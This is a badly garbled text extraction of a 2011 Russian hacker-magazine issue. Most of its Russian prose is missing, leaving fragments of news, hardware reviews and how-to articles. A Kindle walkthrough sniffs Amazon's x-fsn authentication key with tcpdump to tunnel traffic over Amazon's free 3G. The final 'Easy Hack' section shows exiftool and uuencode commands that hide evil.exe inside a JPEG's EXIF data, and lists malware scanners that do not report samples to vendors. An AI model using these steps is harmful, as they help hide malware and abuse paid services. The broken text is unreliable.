Хакер 2011 04 PDF

x 04 (147) 2011
.
210
:

DNS-: . 54
04 (147) 2011
NATIVE API

. 110
BLACK HAT /
BLACK HAT

. 64
147
AMAZON KINDLE
FACEBOOK
TJAT.COM
-
GEOHOT VS SONY
GO

CISCO
. 60
INTRO
CeBIT :
,
,
. CeBIT,
20
IT- , , .
4 200 70 , 340 000

, 380 000 2
.
IT-
.
.

: - CeBIT , -
.
. ,
,

:
CEO
, .
,
, . , ,
Black Hat,
,
.
64 , - .
!
nikitozz, . .
udalite.livejournal.com
Content
MegaNews
004
Ferrum
016
018
Samsung 9-
PC_Zone
023
024
Kindle
028
Amazon

Google
Google/Gmail-
030
034
Facebook
500
Google
037
Lotusphere 2011
042
048
054
060
064
070
Easy-Hack
ICQ-
DNS.
076
084
090
095
100
105
110
116
Go
Augmented reality
Native API
SYN/ACK
120
126
132
CRM
OpenVZ
136
143
Symantec, McAfee Trend Micro
Unit- C++
ring0-
Samba-
Ubuntu
140
X-Tools
BSD
Cisco
Welcome to BlackHat!
GeoHot vs Sony

Tjat.om:
MALWARE
072
080
IBM
038
144
FAQ UNITED
FAQ
8.5
WWW2
web-
028
Google
Google-
064
Welcome to BlackHat!

072

ring0-
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
>

> DVD

Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)

> xakep.ru
(xa@real.xakep.ru)
/ART
>-

>

/PUBLISHING
>
, 115280, , . ,19, , 5 , 21
.: (495) 935-7034, : (495) 545-0906
>

>

>.

>

>

>

>

>

>

.: (495) 935-7034, : (495) 545-0906
> TECHNOLOGY
(komleva@glc.ru)
>
(olgaeml@glc.ru)
(alekhina@glc.ru)
>
(polikarpova@glc.ru)
>
(maligina@glc.ru)
>
( )
(strekneva@glc.ru)
>

>

> -
(alekseeva@glc.ru)
> MAN TV

>

>

>
(kosheleva@glc.ru)
>

>

> :
DVD-: claim@glc.ru.
>

: (495) 545-09-06

: (495) 663-82-77

: 8-800-200-3-999
>
101000, , , / 652,

,

77-11802 14.02.2002
Zapolex,
.
176 394 .

.

. ,
,
.

.
.

:
content@glc.ru
, , 2011
MEGANEWS
Mifrill (mifrill@real.xakep.ru)
Meganews
!
(, Cola, )
, , . Powertrekk
, , ,
. Powertrekk ,
, , - .
1000 .
, 1600 , , Powertrekk . , , .
52 , 19 30 . 4
/ , 15 . , , , . Powertrekk, ,
. Powertrekk
, USB.
Powertrekk ( ), ,
5, 10 24 . ,
, Powertrekk . , , .
Arstechnica : 30%
- ,
( P2P ).
IPAD 2
, Apple
iPad 2 ,
.
: 33% (8.8
, iphone 4), 10%.
, iPad : , -
004
720p, ,
FaceTime.
,
A5,

(A4). , (,
, ),
. iPad 2
,
Smartcover . ,
, iPad .
($39) ($69).
HDMI-
1080p. iPad ( iPhone 4 iPod touch)
, $39. iPad 2
. : Wi-Fi $499
16-, $599 32- $699 64-
. Wi-Fi 3G $629, $729 $829 .
X 04 /147/ 2011
MEGANEWS
WEXLER
.
,
. , Wexler.book E5001.
Wexler (600x800),
E-ink.
:
( 11 000 ).
c Wexler.book E5001 ,
.
(,
, - :) ). 4 ( 200 000 ),
20 MicroSD.
.
, ,
. mini-USB,
, FM- .
5990 .
Microsoft
2 Windows Phone 7.

,
.
Fujitsu
Kyocera Communications. Kyocera
Communications Android-
Kyocera Echo,
3.5
800 480.
: Qualcomm
Snapdragon QSD8650 (1 ), 512
(RAM), 1 -. microSD ( 32 ),
5 ,
Wi-Fi Bluetooth, , , GPS.
, , , .
,
. ,
,
.
, 8 .
Fujitsu .

, Fujitsu
MWC 2011 Fujitsu ,
,
.
,
,
. , ,
,
Kyocera Echo.
Symbian, , Android.
Kyocera Echo
$200,
. $800-1000.
-
( ) IT
. , Facebook ,
, Wikileaks
. , LIGATT Security
International, ,
, .

006
- . ,
,
IT- ( LIGATT Security
International) , , .
, ,
, , .
X 04 /147/ 2011
MEGANEWS
MICROSOFT NOKIA

. , Nokia Microsoft
( ,
),
, ,
Office
Mobile . , , Nokia

Windows Phone 7, WP7
.
Symbian ,
-
. Intel Nokia
MeeGo, , ,
.
, ?
,
, :
Bing
adCenter
Nokia. Nokia Maps,
,
Microsoft.
Nokia Store Microsoft Marketplace . Nokia
Windows
Phone.
Mozilla
.
$40 000! ,
$500, $3000.
, !
,
. ,
. ,
: 2015 (,
) .
, ?
. ,
, ,
. ,
. , , ,
. , , -, ,
. ,
, ,
. ,
, ,
, ( !)
. . ,
? .
008
X 04 /147/ 2011
MEGANEWS
WP7?
:

Windows Phone 7
Device Manager. , ,

,

, . , , Windows Phone 7 Device Manager
,
Windows Phone 7 ( Chevron WP7),
.
,
Microsoft , -,
.

Service Pack 1 Windows
Phone 7,
. -
,
touchxperience.com.

.

,
. ,
WP7

(
),
,
.
45
, (
). , .
SMS-
, : , , .
, ,
-. IP-
, ,
IP- .
SMS- ,
(DDoS-, , ),
ShmooCon 2011, . SMS-,
Android,
, .
, ,
. ,
, , SMS-, - . , , .
( ?), ,
. , , . ,
: grmn00bs.com/2011/01/30/smartphonecode-release-for-shmoocon.
010
X 04 /147/ 2011

,
The
Anonymous

WikiLeaks.
,
DDoS-,

,

(
PayPal, Mastercard, ,
), .
,
. Financial
Times, , ,
,
, ,
45 , . :
HBGary Federal
HBGary,
, , .

Facebook, IRC-,
, , ,
. , ,
,
, , RSA Conference 2011
-. ? . ,
Financial Times
... DDoS-
, Anonymous ,
: - ,
HBGary Federal . , 60 000 .
,
HBGary,
, ,
. hbgary.com rootkit.com.
( The Pitare Bay).
, ,
, iPad. , ,
, ,
. ,
Bank of America WikiLeaks: , WikiLeaks,
- ,
. , WikiLeaks,
. , ,
, . ,

, ,
.
MEGANEWS

,
80- .
Jeopardy! (
), IBM Watson?
, .
,

IBM. Watson $77 000,
Jeopardy!
Watson
.

: Watson

,

- . , IBM
,
.

, 2007
295 (295 ).
INTEL
Intel Sandy
Bridge , 32- .
,
. , Cougar Point,
.
Intel Core ( SandyBridge), , , .
SATA - SATA
, , ,
.
. ,
. , , Intel , :

(
). Intel
, .
, , ,
HP, Dell Toshiba
, .
Intel
,
$700 000 000. , , , , ,
Intel . .
Microsoft , . ,
Windows
. !
0-DAY
Computerworld
Intel , . Intel
, . , ,
0day- ,
. , , , ,
012
, , ,
. , ,
Intel , McAfee (
).
,
. ,
, , Intel.
X 04 /147/ 2011

.
Symantec, , Black Hole Exploits Kit .
, 10% ,
Black Hole 100 000 .

- Neosploit
Phoenix.
$1500, . Symantec (
-)
. Java,
HCP (CVE-2010-1885), PDF, MDAC .

.
, ,
iframe
. . ,
,
:).
, , Websense. Tinie
Facebook Viral Application , ,
, ,
- .
,
Facebook,
.
$25,
.
-, ,
, ,
. ,
,
,
. .
, ,
,

.
. ICANN , IPv4
. IPv6 ,
- .
HTML5 CAMP
,
HTML5. ,
, . ,
HTML5 Camp,
-. . , - Opera Software,
Canvas
SVG. , .. ,
HTML5.

. ,
2011 HTML5
Working Draft Last Call, 2014
W3C. ,

HTML5 Camp. microsoft.com/ru-ru/events/html5camp.

, ... . RoboEarth,
(roboearth.org). . World
Wide Web; Wikipedia, , .
? ,
, , .
, RoboEarth,
.
AMIGO.
, , , AMIGO,
RoboEarth . ,
X 04 /147/ 2011
,
. , RoboEarth
- ,
. ,
, :).
013
MEGANEWS
RADEON HD 5570 -
, ,
-. , , . ,
, : Sapphire SAPPHIRE HD 5570 XtendTV.
TV-
Mirics FlexiTV, -
DVB-T. , -, Media Center ,
.
SAPPHIRE HD 5570 XtendTV Mirics
FlexiStream 49 USB 2.0.
Sapphire
, (
, ). XtendTV, .
GPU, Radeon HD 5570 GDDR5
1 , . DVI
HDMI,
. , ,
, , Sapphire, , ?
Arbor Networks , 2010

DDoS- : 100 /.
2009 !
.
SOURCEFORGE
SourceForge.net. , ,
.
, CVS-, web- (ViewVC)
014
, shell
ProjectWeb. -
- , . ,
sourceforge.net
. .
- , (!)
. , ,
, SourceForge
. :
(CVS ViewVC) ! ,
, , . ,
Sourceforge.net ,

. , , , SourceForge
, , GitHub
Google Code.
X 04 /147/ 2011

,
Level-up ,
,
,
,
,

USB-,
-

.

,
Linux
.
.
,

,

,
.

ZyXEL
Keenetic Linux NDMS.
.
,
nomppe nomppc maxfail 0
holdoff 60
pppd-. PPTP-
, .

Keenetic: , 802.1,
VLAN
( 802.1Q
).
:
PPTP L2TP
90/70 /, PPPoE IPoE
95 /.
Ethernet,
3G/4G-.
,
, 3G- (
)
.
. Keenetic
.
,
X 04 /147/ 2011
-.

-
, .
Transmission . ,
-
, :).

!
30 USB- 3G 4G, Jingle Yota.
USB-.

.

.
: -
..
Keenetic
GDI-.
802.11n.
,
Wi-Fi , .

.
802.11n 300 /. . ,
100- Ethernet,
802.11g!

Wi-Fi.

IP-.

.
. Keenetic

, IPTV
Wi-Fi. IPTV
.
(
)
.
USB.
Keenetic , .

-.

,
Linux .
Keenetic

(FAT/FAT32/EXT2/EXT3/
NTFS) , SMB FTP
( ).
.
, . , , ,

.

. Keenetic
SPI DDoS-.
Wi-Fi Protected Setup (WPS)
Wi-Fi
.
015
FERRUM
, ()

Samsung 9-
:
: 13.3'', 1366768, LED-, 16
: 400 (/2), SuperBright Plus
: Intel Core i5-2537M, 1.4
: Intel HM65
: DDR3 4
: Intel HD Graphics 3000
: SSD 128
: Bluetooth 3.0, Wi-Fi 802.11n
: USB 3.0, USB 2.0, micro HDMI, HP,
MicroSD
: -
: 46 * ( )
: 328227~16
: 1.31
, , .
, - , , ,
, . ,
, . ,
. Samsung 9-
,
. SMS
MMS .
, ,
Samsung 9- . !
Samsung 9
. , , ,
, 17 , Samsung 16.
! , ,
. ! . ,
. ,
, . Samsung ,
, .
,
, . ,
(
) Samsung 9-
, . ,
(+100500
016
, ).
! .
, . Samsung 9-

. , ,
, ,
.
, !
, , .
, ,
, , .
(
). . ,
.
Samsung 9- , -, ,
. USB,
.
- MicroSD
. Micro HDMI ,
. ,
, HP. Ethernet
RJ-45 ,
, .
Samsung 9- Ethernet, Wi-Fi 802.11n. SSD-, HDD . Bluetooth
3.0, .
, , Intel
Sandy Bridge. 32 , Intel Core i5-2537M . ! Intel HD Graphics 3000 , NVIDIA
GeForce GT 320M, NVIDIA GeForce GT 420M AMD Radeon HD 6470M

. , FPS
- 40.
SSD-, , 128 .
X 04 /147/ 2011

sRGB
, Windows,
. HDD.
, , Samsung ( ,
-) .
- 400
, . -,
: 16 .
TN+Film .
sRGB ( )
. ,
Spyder3, .
Samsung 9- Samsung. , !
PhoneShare.
,
,
, .
telnet- Samsung PhoneShare
- GPRS- . ,
, . , Wi-Fi ,
PhoneShare , Ethernet. MMS SMS .

Samsung AllShare DLNA,

X 04 /147/ 2011
: , , , . ,

,
.
DLNA .
? , ,

. .
- (,
!) .
.

. , ,

.
Be cool
Samsung 9
( ), ,
. .
, , .
,
,
. .
,
, -- . .
,
. z
017
FERRUM

,
. ,
. ,
,
.
.
. , .
,
,

Wi-Fi Bluetooth. ,
,
, ,
, . . , ,
. ,
.

,

. 3DMark
06, 3DMark Vantage PCMark Vantage. ,

WinRAR 7Zip.
SuperPi -
018
. Call of Juarez.

, ,
.
,
.
.
, Apple iMac,
Windows 7, .
Acer Aspire AZ3751

ASUS EEE Top ET2010AG 1B
Apple iMac
HP TouchSmart 600-1220ru
Lenovo IdeaCentre A700
Sony VAIO VPCL13M1R
X 04 /147/ 2011
41000 .
82000 .
Acer
Aspire AZ3751
Apple
iMac 27
: c 21.5", 1920x1080
: Intel Core i3-540, 3.06
: Intel H57 Express
: NVIDIA GeForce GT 320, 1
: 4 DDR3, 2x SODIMM
: SATA 1.5 (7 200 /)
: Blu-ray ()
: 10/100/1000 Gigabit Ethernet LAN, Wi-Fi
802.11 b/g/n, Bluetooth 2.1 EDR
: 6--1, (), -
( DVB-T)
: 6 USB 2.0 (2 ), HDMI, FireWire 400, 2 , 2
: 496x549x129
: 6
: 27", 25601440
: Intel Core i5, 2.8
: n/a
: ATI Radeon HD 5750, 1
: 4 DDR3, 2x SODIMM
: SATA 1 (7 200 /)
: DVD SuperMulti
: 2--1,
: 4 USB 2.0, Mini DisplayPort, FireWire 800, , , S/PDIF
: 517x650x207
: 13.8
Acer
. , ,
, web-,
. -,
. , ( )
, .
. , , .
, , Acer
.
, .
: ,
.
.
X 04 /147/ 2011

, Apple
.
27- ,
- ,
25601440. , ,
. -. , . , Magic Mouse, , . Mac
Windows
.

.
80-
. MacOS,
.
019
FERRUM
61000 .
60000 .
Sony
VAIO VPCL13M1R
HP TouchSmart
600-1220ru
: 24", 1920x1080
: Intel Core 2 Duo E7500, 2.93
: Intel P43 Express
: NVIDIA GeForce GT 330M
: 4 DDR2, 2 SODIMM
: SATA 1 (7200 /)
: DVD SuperMulti
802.11 b/g, Bluetooth 2.1 EDR
: 6--1,
: 5 USB 2.0, FireWire 400, S/PDIF
: 429x190582
: 12.5
: 23", 1920x1080
: Intel HM57
: NVIDIA GeForce GT 230M
: 4 DDR3, 2 SODIMM
: SATA II 1.5 (7200 /)
: Blu-ray ()
: 6--1, , S-video,
, IR blaster, HDMI , ( DVB-T), MPEG 4, HP Win7 Media Center
: 5 USB 2.0, S/PDIF
: 583x126x451
: 12
Sony , . ,
.
, .
,
CD DVD.
(,
,
). ,
, .
, ,
.
, - Intel Core
2 Duo . .

-
.
020
. ,
,

! :
Bluetooth Wi-Fi, ,
. ,
, , . -, .
, . ,
, .
web- .
,
,
80- .
X 04 /147/ 2011
43000 .
25000 .
Lenovo
IdeaCentre A700
ASUS EEE
Top ET2010AG
: 23", 1920 x 1080

: Intel HM55
: ATI Mobility Radeon HD 5470 512
: 2 DDR3, 2 SODIMM
: SATA 500 (7200 /)
: DVD SuperMulti
: 6--1,
: 6 USB 2.0, HDMI, S/PDIF
: 568x430x71
: 14.8
: c 20", 1600x900
: AMD Athlon II X2 250u, 1.6
: AMD RX780
: ATI Radeon HD 5470, 512
: 4 DDR3, 2x SODIMM
: SATA 500 (7200 /)
: DVD SuperMulti
802.11 b/g/n
: - 2--1,
: 6 USB 2.0, HDMI, S/PDIF
: 497x374x48
: 4.75
,
JBL. ,

. Intel Core i3 ATI Mobility
Radeon HD 5470, , ,
. Bluetooth,
. , ,
, (, ).
, Lenovo
.
,
. .
-CD.
X 04 /147/ 2011
ASUS .
( 5 ) . AMD ,
512 .
.
,
, (,
).
,
. , .
. , ,
.
021
FERRUM
3DMark Vantage
PCMark Vantage
Sony VAIO VPCL13M1R
Sony VAIO VPCL13M1R

HP TouchSmart 600 1220ru
Acer Aspire AZ3751

Acer Aspire AZ3751
0 500 1000 1500 2000 2500 3000 3500 4000
- Sony
3DMark06
0 1000 2000 3000 4000 5000 6000 7000 8000
Intel
SuperPi
Sony VAIO VPCL13M1R
Sony VAIO VPCL13M1R

Acer Aspire AZ3751

Acer Aspire AZ3751
0 1000 2000 3000 4000 5000 6000 7000 8000
Acer Sony
WinRAR
0 5 10 15 20 25 30 35
AMD ASUS
7-ZIP
Sony VAIO VPCL13M1R
Sony VAIO VPCL13M1R

Acer Aspire AZ3751

Acer Aspire AZ3751
0 200 400 600 800 1000 1200 1300 1400 1600 1800
Acer
, ,
.
. HP
022
40 45 50
0 1000 2000 3000 4000 5000 6000 7000 8000
Acer
TouchSmart 600-1220ru,
. , Acer Aspire AZ3751
. Apple iMac
. z
X 04 /147/ 2011
PC_ZONE
Step (twitter.com/stepah)
Windows.
Microsoft. .
2003 ,
1 500
000 .

,
. ,

(
)
,
.
(
SDL),

( DEP ASLR),
- 0day-,
.
,
,
, Internet Explorer.

,
.
, Microsoft .

Security Essentials,
,
.

Microsoft Attack Surface Analyzer.

, ?
, .

. ,
, Microsoft,
, .

,
-
.
. X 04 /147/ 2011
(
),
:
,
. ,

:
, .
- ,
.

Google Cloud Connect,
- Google
Microsoft Word.

. :
,
? , Attack
Surface Analyzer
( baseline) .
, ,
( ,
, ,
, ,
).
cab-, XML-
( ,

).
,
Cloud Connect.
(
product)
Attack Surface Analyzer,
.
snapshot ,
Generate
attack surface report.
, .
Attack Surface Analyzer
. , Google Cloud Connect:
New Service (Google Update Service);
New Running Processes (google crash
handler and a .NET framework utility);

113 New Registered COM Controls;
3 New Internet Explorer Silent Elevation
Entries / Preapproved controls (Google
Update plugin);
1 New TCP Port (Established outbound
TCP port on 49336);
6 New Named Pipes.
,
,

. (, ,
html-)
,
.

,
,
. Cloud Connect
:

;
,
DEP;
, .
,

, , , .
,
, . . z
023
PC_ZONE
,
Step ()
, (twitter.com/stepah)
KINDLE

Amazon

. ,
. .
Amazon Kindle.
, , , SSH
.

. ,
,
.

: - , ,
. : Kindle Amazon
Nook Barnes & Noble. : QWERTY Linux , Android. , ,
. - .
. Amazon Barnes & Noble
,
, . ,
. Amazon : 2010 115 Kindle-
100 Kindle-,
. : Amazon Kindle
Wi-Fi $139. : $139. , ,
,
. :
Kindle (, , ) . ,
Amazon Kindle , ,
, .
024
, - -
, ( ).
, USPS
( )
1000, .
Visa MasterCard.
, ( 600
). Visa,
-.
, ,
Qiwi. ,
Amazon.com, Kindle . ,
: Kindle Wireless
Reading Device, Wi-Fi, 6" Display, Graphite Latest Generation cannot
be shipped to the selected address. -
! , .
, .
.
, ,
.
, myus.com shipito.
com. $8.50.
(xakep.ru/magazine/
xa/129/040/1.asp). : Kindle
? : - $180 ($139 , $0
X 04 /147/ 2011
HTTP://WWW
links
Amazon

Kindle?
Settings:
3G-: 311 (ALT+EQQ);
:
411 (ALT+RQQ);
3G-: 611 (ALT+YQQ);
WiFi-: 711
(ALT+UQQ).
:
.
,
.
, :
bit.ly/cyr_sym;
:
bit.ly/rus_kindle;
fb2-:
bit.ly/fb2_kindle;
,
PDF DJVU:
wiki.mobileread.com/wiki/Duokan_Kindle;
:
bit.ly/slovari_kindle.
, $8.5 , $30 ),
5000 Wi-Fi. .
,
. , Kindle
.
, Amazon - .
. , . , , .
, fb2
epub. , Kindle ,
, . ,
, Kindle . .
1. , Amazon.
X 04 /147/ 2011
Kindle:
the-ebook.org/
forum/viewforum.
php?f=37;

Amazon:
mobileread.com/
forums/forumdisplay.
php?f=140.
INFO
info

Kindle. ( 3.1)

,
.

,
Amazon.
. Kindle e-mail user@free.kindle.com.

convert
,
, Kindle (
Sync & check for items). ,
Amazon , .
2. -,
USB.
Calibre. ,
. , ,
user@free.kindle.com.

. Instapaper (instapaper.com),
. .
, -
025
PC_ZONE
Shipito
, ( Read later) Instapaper.
,
- , ,
Kindle. Instapaper
Kindle-
usb-. , @free.
kindle.com ( @kindle.com), .
Instapaper ,
. ,
Google Reader.
,
-, , .
, kindle.topixoft.com.
jailbreak
, .
,
. .
,
. , , ,
3G-
. Amazon
Kindle, .
:
1.
, (mobileread.
com/forums/showthread.php?t=88004). kindle-jailbreak-0.6.N. .
.bin-, src.

Kindle, .
update_*_install.bin.
k2 K2 US, k2i K2 GW, dx KDX
US, dxi KDX GW, dxg KDX Graphite, k3g K3 3G (US [B006]), k3w
K3 WiFi [B008] k3gb K3 3G (UK [B00A]).

. Kindle
, update_k3g_install.bin.
2. Kindle,
Home Menu Settings Menu Update Your Kindle.
, , .
.
3. Kindle .
026
Kindle
3G
,
. . Kindle 3G
Free 3G Worldwide.
, ,
( SIM-)
. !
, , Wi-Fi
. , ,
, (
) , Amazon. : !
@kindle.com
(99 , ).
,
. ,
. ,
, Kindle .
, Amazon ,
. !
Kindle tethering-,
! , ?
. .
,
3G ( : client0.cellmaps.com/viewer.
html?cov=1 ).
, ? , (balaganov.wordpress.
com/2010/09/25/tethering-the-kindle-3). ,
:
1. ( ,
), Kindle
, ,
. , usbNetwork (bit.
ly/usbNetwork).
, Kindle,

, , .
2. Kindle
. ,
QWERTY-. : Home
Del ;debugOn Enter. .
X 04 /147/ 2011
telnet
usbNetwork
, : "~usbNetwork"[Enter].
3. . , RNDIS/
Ethernet .
,
. ,
Xerox (bit.ly/RNDIS_driver). Windows 7/Vista Windows Mobile Device Center
(bit.ly/wmdc_download).
4. .
IP- 192.168.2.1 255.255.255.0.
PuTTY Kindle ( IP- 192.168.2.2) telnet. Linux.
5. SSH-.
,
PuTTYgen (
PuTTY).
Generate,
.
Kindle .authorized_keys usbnetwork/
etc. , , Save public key,
BEGIN SSH2 PUBLIC KEY, Kindle SSH-.
-
.
6. SSH,
WinSCP. root
. , X 04 /147/ 2011
mntroot rw.
7. tcpdump
ARM- (eecs.umich.edu/~timuralp/tcpdump-arm),
Kindle, .
? , HTTP-,
, - Amazon.
- (x-fsn
authentication key), . ,
,
,
.
8. ~/tcpdump-arm -nAi ppp0 -s0 w
xfsn.log . xsfn.log
, x-fsn:.
: cat xfsn.log | grep -m 1 x-fsn.
9. .
,
Modify Headers (bit.ly/modify_headers) Firefox.
, x-fsn: .
10. , Kindle. Firefox -
127.0.0.1:888 SSH- .
PuTTY 888 : 888:72.21.210.242:80 root@192.168.2.2. 72.21.210.240
Amazon, 192.168.2.2
Kindle, 888 .
,
Kindle .
11. usbNetwork DISABLED_
auto auto, .
, 3G
. ( , SSL). ! ( ) .
, Amazon -
. ,
.
Kindle .
Amazon
,
. .
.
, . . z
027
PC_ZONE
Step (twitter.com/stepah)
GOOGLE
DVD
dvd
Google/Gmail-

, ,
, . Google
.
!
Google- .
,
Google, , .
, - , - ,
.
, Gmail
(
),
.
,
.
, ,

. ,
.
. :
028
, ;
, .
-,
. , ( TAN)
.
Google, . :
Google Authenticator,
Android, iPhone
Blackberry;
SMS-,
Google;
( , SMS).
, :
.
. ,
(, , ),
.
, Google . !
X 04 /147/ 2011

Google (google.com/accounts).
Personal Settings Security
Using 2-step verification,
.
.
, Google Authenticator ( iPhone, Android
Blackberry), .
, Google, secret
key . ,
QR-. Google Google
Authenticator ,
SMS-.
.
,
.
( backup) ,
. Google - ,
. , -
, ,
. .
:
( ), SMS
(
).
, ?
, , .
1.
Google (, Gmail).
2. , .
3. . Google
. Google Authenticator .
SMS
X 04 /147/ 2011
4. Remember verification for this computer for 30 days

30 .
5. , Google, .
, . , , : , ,
- ,
, POP3/IMAP?.
.

.

, .
, Google
. ( ,
- ) ( Application-specific
passwords). ,

.
google.com/
accounts/b/0/IssuedAuthSubTokens (
Security Authorizing applications & sites).
-,
Google Oauth.
Application-specific passwords. :
1. ,
.
2. Generate password.
3. Google 16- ,
/.
4. .
, , , .
,
,
.
( revoke) .
, , ,
. ! :) z
029
PC_ZONE
(insight-i t.ru)
FACEBOOK
500
Facebook, ,
.
, . .
Facebook ?
:
500 000 000 ( );
200 000 000 000 ;
150 000 000 ;
2 000 000 000 000 ;
030
20 000 000 000 4- .

, 10 ,
;
1 000 000 000 ;
100 000 000 ;
400 000 ;
X 04 /147/ 2011
HTTP://WWW
links
Facebook
;
;
;
opensource-.
500
;
1 000 000 ;
, .
?
,
,
-
Facebook ,
. ,
, .
.
,
, .
, ,
Facebook, .
, , .

Unix: , ,
.
, ,
, . ,
,
Facebook:
Linux;
PHP + ;
memcached;
- MySQL;

Scribe.
php-
, HTML
( MySQL, memcached) X 04 /147/ 2011
Facebook

20
Facebook?
1 000 000 ;
1 323 000 ;
1 484 000
;
1 587 000
;
1 851 000 ;
2 000 000 ;
2 700 000 ;
10 200 000 ;
4 632 000 .

Facebook

: insightit.ru/highload
DVD
dvd

Facebook
.
. , Facebook :
-;
;
.
, ,
. .
PHP
: PHP? . , ,
. .
. ,
,
, .
. Facebook
PHP,
-, APC ( ,
, )
( memcache, , , ,
, ).
031
PC_ZONE
Facebook
.
, :
SMC ( ) , , ;
ODS , ;
Gatekeeper ,
A/B- (, ,
).
HipHop PHP C++.

: PHP, C++. , ,
. HipHop , .
, PHP. HipHop opensource , .
MySQL
. , MySQL
Facebook . ,
. .
,
JOIN, ,
. . -,
. Facebook MySQL, ,
. , .
,
.
, ( )
( , , ),
( ) ,
.
Memcached
, memcached -. Facebook MySQL,

. 25 ( )

250 . PHP, - -
032
opensource

Facebook.
: Thrift (incubator.apache.org/thrift), Scribe (github.com/
facebook/scribe), Tornado (tornadoweb.org), Cassandra (cassandra.apache.org), Varnish (varnish-cache.org), Hive (hive.apache.
org), xhprof (pecl.php.net/package/xhprof).
PHP, MySQL, memcached.
Facebook opensource ,
opensource (developers.facebook.com/opensource).
Facebook

memcached MySQL . memcache
multi-get ,
.
Facebook
. opensource-
memcached: 64- , ,
, , memcache UDP
( TCP-).
Linux memcache.
? memcached 250 000
30 000 40 000 .
Thrift
Facebook
Thrift. ,
.
.
Thrift
, , , C++, PHP, Python, Java,
Ruby, Erlang, Perl, Haskell. (,
, ) (,
JSON). : , , , .
SOAP, CORBA, COM,
Pillar, Protocol Buffers, , Facebook .
X 04 /147/ 2011
Facebook

Facebook Connect

Facebook
MySQL,

. ,
.
-, . .
,
CDN (
) .
. ,
.
(blob), ,
( , ) . Facebook
Haystack . , !
Thrift . ,
. Thrift
. Facebook ,
. :
. Thrift, Facebook,
.
,
,
. . . .
:
,
, NFS;

NFS HTTP. ,
, ,
.
, , . ,
X 04 /147/ 2011
, LAMP , .
, PHP+MySQL+Memcache ,
. ,
:
PHP ;
PHP ;
.
Facebook ( ) ,
,
,
, ,
.

.

,

. . facebook.
com. z
033
PC_ZONE
:
GOOGLE

Google
. ,
. , .
, Google. .
, . , ,
, runtime, Chrome OS, Native
Client. () . -
034
. , ,
,
code.google.com/p/nativeclient. Runtime- . Google ,
ThreadSanitizer (ode.google.com/p/datarace-test), data races
( ).
X 04 /147/ 2011
Google
1. ? ?
: ?
2. .
. ( ):
? : ,
?

,
.
, Google
google.ru/jobs, ,
Google . ,
. : ?
: , , .
. ?
. , , .
.
. Google ++ Jav: ,
, . ,
C#, , C++. ,
C#,
,
. , , . , ,
. , Google
, :
, : , ,
(, ).
,
.
:
X 04 /147/ 2011
. , Google, ,
. ,
:
Google, , .
,
. , : 18
. , , . ,
. , . Google
. , ,
.
, 12. , ,
. ,
. - 9, - 12, - 3
. , , .
7 , 8 .
Google . . . , ,
- :
, -!.
Google , .

. , ,
, .
HTML5 , , -.

HTML5, .
.
Chrome OS . ,
. ?
- ,
. . Chrome OS . Chrome OS , ( ).
,
035
PC_ZONE

. Chrome OS
, .
App Engine
.
, .
.
, .
, . ,
, ,
. , , ,
. ++,
. ,
.
, .
,
, ++. , ,
. .
036
Tech-talk,

Go
Go,
. Google
, .
, Go ,
. . ,
. ++ ,
. . , ,
. , ,
++. ,
++. , , ,
.
,
. Go . ,
, implements ( Java) .
Go
, .
. . . z
X 04 /147/ 2011
LOTUSPHERE 2011
IBM
IBM
Lotusphere, .

:
, ,
, .
IBM Lotus (
) , Lotus
Notes Lotus Domino. , , . , ,
- .
.
: Get Social. Do Business.
social , IBM Lotus. ,

, e .
,

. ,
? .
,
Lotus. Lotusphere 2011
( ) ,
.
.
, Lotus,
, collaboration,
. ; ,
.
,
,
. , e-mail (
) - . ,
! , , 2011 , . ,
, .
,
Lotus,
X 04 /147/ 2011
Activity Stream Inbox

. -
.
, .

. -,
, , ,
, . !
IBM Watson IBM,
, , .
- .
.
IBM , .
, ,

. Lotus
.

: iPhone/iPad, Android Blackberry (
, - RIM
Play Book). -
. : Lotus Symphony
( IBM, )
Lotus Live ,
.
, . : lotuslive.com/en/symphony.
Lotusphere .
,
. . , ,
Be social. Do Business. z
037

GreenDog (agrrrdog@gmail.com)
Easy Hack
1
:
JPEG.
:
- .
Wikipedia,
e . ,
. ,
( ), . , e. . e
, :).
e XXI , . jpeg (dl.packetstormsecurity.
net/papers/general/Embedding_hidden_files_in_jpeg_and_abuses.pdf ).
-, , e e :). , , , /
exif- jpeg-. Exif ,

(), , , . ,
.
, e .
.
- linux. .
e test.jpg, , evil.
exe. exif- jpeg:
exiftools test.jpg
exiftools exif. exif . . evil.exe Base64.
evil.exe Base64 Comment

exiftools test.jpg,
. .
, e . . .
, , . ,
facebook flickr! , ,

( ), -
. exif-!
.
evil.exe jpeg .
, :
dd if=test_from_FB.jpg of=test_from_FB.uue bs=1 skip=24
uuencode m evil.exe evil.exe > evil.txt
uuencode ; m ,
Base64.
exif- test.jpg.
exiftool Comment "<=" evil.txt test.jpg
:
-Comment , ;
"<=" evil.txt evil.txt.
038
dd ;
if ; of ; bs=1 1 ;
skip=24 24 ( jpeg).
, test_from_FB.uue
, evil.exe Base64. exe-:
uudecode test_from_FB.uue
.
X 04 /147/ 2011
e *nix, Win,
. :
1. jpeg.
2. "" ( exif).
3. .
:
, VIRUSTOTAL.
:
, -!
. - (, ),
.
, ,
, , , .
,
, , .

, , . ,
- . ,
, ,
X-Antivirus-Status:
, . X-Antivirus: ,
.
, ,
, . ,
- ( X-spam)
( X-Mailer). .
,
. . .
-.
, - . , .
netcat - .
, -:
4. jpeg - .
5. .
6. e Base64.
Base64
-.
virscan.org;
virusscan.jotti.org;
scanner.virus.org;
vscan.novirusthanks.org;
e-antivirus.com.
,
.
e ,
, ,
e. , .
e . e , ,
.
,
No distribute, , /
. (forum.antichat.ru/
threadnav32269-1-10.html) , .
, . , e -,
, , ().
wizard-checker.com;
virtest.com.
virustotal.com;
viruschief.com;
filterbit.com;
. MS Outlook Express
. Avast
X 04 /147/ 2011
039
:

, .
, e ,
, . (Positive
Technologies) ptsecurity.ru/download/PT-Metrics-Passwords-2009.
pdf. e . , e . ,
:).
:
(BIN2HEX)
e :
skullsecurity.org/wiki/index.php/Passwords;
devteev.blogspot.com/2010/01/weak-passwords.html.
e
:
123456 (+\- 2 );
